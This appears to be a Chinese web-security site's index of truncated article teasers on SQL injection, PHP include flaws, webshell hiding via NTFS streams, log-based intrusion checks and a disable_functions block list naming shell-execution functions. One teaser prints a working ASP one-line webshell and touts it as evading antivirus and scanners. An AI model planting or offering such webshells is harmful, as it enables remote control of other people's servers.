脚本攻防

在最近两年中，安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制，如果你的网络应用程序开发者没有遵循 安全代码进行开发，攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref...

这是利用NTFS流隐藏你的一句话小马，这方法，文件写入后，不容易给发现，隐藏性好！如下是ASP脚本的例子！NTFS流文件的内容如下<%re= request("test")if re <>"" ...

dedecms广告内容没有做限制,可以输入脚本信息，并写入文件，导致木马植入！ 此补丁，是防止广告里带PHP脚本并写入文件！ 核心代码：ad_js.php 复制代码 代码如下: //禁止写入和PHP脚本有关字符信息 //================...

1. 如何查看ORACLE的隐含参数? 　　ORACLE的显式参数，除了在INIT.ORA文件中定义的外，在svrmgrl中用"show parameter *"，可以显示。但ORACLE还有一些参数是以“_&rdquo...

事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到，小黑的伎俩很高级，每次使用完毕总是把后门删掉，但是每次都能继续进来，总是找不到从哪进来的。这个着实让人蛋疼。后来，终于在日志中发现一丝蛛丝马迹，通过我的分析，我发现一个I...

================ php包含漏洞替代技术 ================ php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数，特别是include()和require()这两个函数。 这个常见的错误导致了众所周知的远程...

Linux系统用netstat命令查看DDOS攻击具体命令用法如下： 复制代码 代码如下: netstat -na 显示所有连接到服务器的活跃的网络连接 复制代码 代码如下: netstat -an | grep :80 | sort 只显示连接到80...

1、查看谁破解你的ssh cat /var/log/auth.log | grep "pam_unix(sshd:auth): authentication failure;" | cut -f14 -d\\ | cut -d\&#...

以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的！网上很少人用！可以插在网...

要不容易出错的。 复制代码 代码如下: <style type=\”text/css\”> <!– body,td,th { font-size: 12px; } –> </...

作者：y0umer 　　打开网站发现 　　习惯的加了一个引号 　　确定是注入以后直接丢啊D了。(我懒) 　　这不悲剧了么，猜不出表段?? 　　扫扫目录看看。 　　发现del.asp打开看看。。 　　错误提示的是在查询表达式中"id="...

禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 复制代码 代码如下: disable_functions = system,exec,shell_exec,passthru,pr...